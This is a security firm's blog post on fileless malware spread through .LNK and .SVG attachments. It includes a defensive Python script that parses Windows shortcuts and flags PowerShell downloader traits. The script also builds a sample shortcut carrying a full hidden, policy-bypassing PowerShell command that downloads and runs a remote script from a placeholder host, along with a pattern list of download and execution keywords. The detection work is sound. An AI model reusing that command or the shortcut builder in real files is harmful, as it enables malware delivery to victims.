Malware Distribution and Detection Has Now Become a Bit More Tricky – Fileless Malware
By Randall Sylvertooth, MSc

Redport Information Assurance
According to Microsoft’s Malware Protection Center, malware distributors are moving away from one of the more popular malware distribution file formats, JavaScript (.js) attachments, and are instead sending .LNK (Windows shortcut) and .SVG files inside ZIP archives to spread payloads more efficiently and with more stealth. Microsoft’s analysis was based on malicious PowerShell scripts embedded in these attachments, which downloaded payloads such as the Kovter Trojan. The technique is not new: it has also been used to distribute the widespread Locky ransomware. PowerShell code can also be used to deliver fileless attacks, in which the payload is launched directly in system memory rather than being written to disk as an executable, so file-based antivirus scanning has nothing to inspect. That is what makes this style of attack more ominous.
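The .LNK trick described above is worth seeing at the byte level. The following is an added example, not code from the original post or from Microsoft’s analysis: it parses a shortcut’s MS-SHLLINK header and StringData fields to recover the target path and command-line arguments, then flags the PowerShell launcher traits an analyst looks for (hidden or minimised window, profile and execution-policy bypasses, Invoke-Expression fed by a web download, encoded commands). The two shortcuts it inspects are constructed inside the script; the dropper is modelled on the technique the paragraph describes, not taken from a real Kovter sample, and its URL is a placeholder.

```python
"""Triage Windows shortcut (.LNK) files for embedded PowerShell launchers.

Added example: parses the fixed ShellLinkHeader and the StringData section of
the MS-SHLLINK format and scores target + arguments against downloader
indicators. Sample shortcuts are constructed by build_lnk(); not real malware.
"""
import re
import struct

HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046}, the Shell Link CLSID, in on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that decide which variable-length sections follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 0x7  # ShowCommand value that starts the target minimised

# StringData fields appear in this fixed order, each present only if its flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# (regex, label) pairs, matched case-insensitively against target + arguments
INDICATORS = (
    (r"powershell(\.exe)?", "invokes PowerShell"),
    (r"-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"-(w|win|windowstyle)\s+hidden", "hidden window"),
    (r"-(nop|noprofile)\b", "skips profile"),
    (r"-(ep|ex|exec|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", "downloader"),
    (r"frombase64string", "Base64 decoding"),
)


def _u16(data, pos):
    if pos + 2 > len(data):
        raise ValueError("truncated .LNK at offset %d" % pos)
    return struct.unpack_from("<H", data, pos)[0]


def _u32(data, pos):
    if pos + 4 > len(data):
        raise ValueError("truncated .LNK at offset %d" % pos)
    return struct.unpack_from("<I", data, pos)[0]


def is_lnk(data):
    """Cheap magic check: HeaderSize and CLSID are fixed for every shortcut."""
    return len(data) >= HEADER_SIZE and data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LNK_CLSID


def parse_lnk(data):
    """Return ShowCommand plus whichever StringData fields the shortcut carries."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link (.LNK) file")
    flags = _u32(data, 20)
    fields = {"show_command": _u32(data, 60)}
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) followed by the IDList
        pos += 2 + _u16(data, pos)
    if flags & HAS_LINK_INFO:  # LinkInfoSize counts itself, so skip exactly that many bytes
        pos += _u32(data, pos)
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = _u16(data, pos)  # CountCharacters, not a byte count
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated StringData field %r" % key)
        pos += count * width
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return fields


def triage_lnk(data):
    """Return the indicator labels that fire for a shortcut (empty list = nothing suspicious)."""
    fields = parse_lnk(data)
    cmdline = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    hits = [label for pattern, label in INDICATORS if re.search(pattern, cmdline, re.IGNORECASE)]
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("window minimised (SW_SHOWMINNOACTIVE)")
    return hits


def _string_data(text, unicode):
    raw = text.encode("utf-16-le") if unicode else text.encode("cp1252")
    return struct.pack("<H", len(text)) + raw


def build_lnk(relative_path, arguments, show_command=1, unicode=True):
    """Build a minimal shortcut (constructed test input): header, two StringData fields, terminal block."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + _string_data(relative_path, unicode) + _string_data(arguments, unicode) + b"\x00" * 4


# Constructed samples: a benign notepad shortcut and a Kovter-style PowerShell downloader (placeholder URL)
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe", r"C:\Users\Public\readme.txt")
DROPPER_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\"",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_LNK), ("dropper", DROPPER_LNK)):
        print(name, triage_lnk(blob))
```

Because a fileless payload leaves nothing on disk for a scanner, the shortcut that launched PowerShell, together with the PowerShell command line recorded by process-creation or script block logging, is often the only artifact left behind; triaging the .LNK at the mail gateway or in the victim’s download folder catches the first stage even when the second stage never touches disk.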

Before this post was written, Google had already announced that Gmail would block JavaScript (.js) file attachments starting in February 2017. Unfortunately, blocking those attachments has also pushed threat actors to research and discover alternative distribution techniques. LNK and JS attachments are easy to ban outright at the mail gateway, but SVG is a tad more difficult because it is a widely used image format. The catch is that SVG is XML and can carry embedded script, so a filter that lets images through also lets that code through.

Reference: http://www.itworld.com/article/2694022/security/hackers-make-drive-by-download-attacks-stealthier-with-fileless-infections.html


For more information about Redport’s information assurance and cyber security services, visit www.redport-ia.com, email us at info@redport-ia.com, like us on Facebook, and follow us on Twitter @redport_ia.